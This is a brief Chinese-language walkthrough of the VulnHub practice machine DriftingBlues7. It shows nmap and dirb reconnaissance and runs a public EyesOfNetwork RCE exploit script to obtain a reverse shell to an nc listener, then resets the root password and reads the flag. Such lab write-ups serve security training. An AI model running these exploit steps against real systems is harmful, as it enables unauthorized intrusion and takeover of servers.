vulnhub实战——Driftingblues7
前言
无聊发现vulnhub上一个新靶机,下载来玩玩看,挺简单的。搜了搜没教程就写个教程给大家参考一下吧~
靶机下载地址:https://www.vulnhub.com/entry/driftingblues-7,680/
可以直接用VM打开,ip会自动获取并显示出来(挺人性化的)
正文
通过nmap扫描靶机nmap -sV -O 192.168.171.134
发现有80端口,我们访问一下发现为一个登录页面,后台名称为EyesOfNetwork
再目录爆破一下看看有没有其他东西
dirb https://192.168.171.134
没什么有用的东西,连robots.txt都没有,再继续研究那个登录页面,百度搜索Eyes of network发现可以利用的exp
模块链接[https://github.com/h4knet/eonrce]
下载之后放入kali运行,需要先赋予运行权限
chmod +x eonrce.py
运行脚本./eonrce.py https://192.168.171.134 -ip 192.168.171.129 -port 8848
-ip 指定本机ip -port 指定nc监听的端口
渗透成功!!!!!!然后我们修改root的密码
passwd root
由之前扫描发现开了ssh服务,我们用ssh连接靶机ssh 192.168.171.134
查看root用户目录下的文件,发现有个叫做flag.txt的文件,查看一下
Congratulations!!!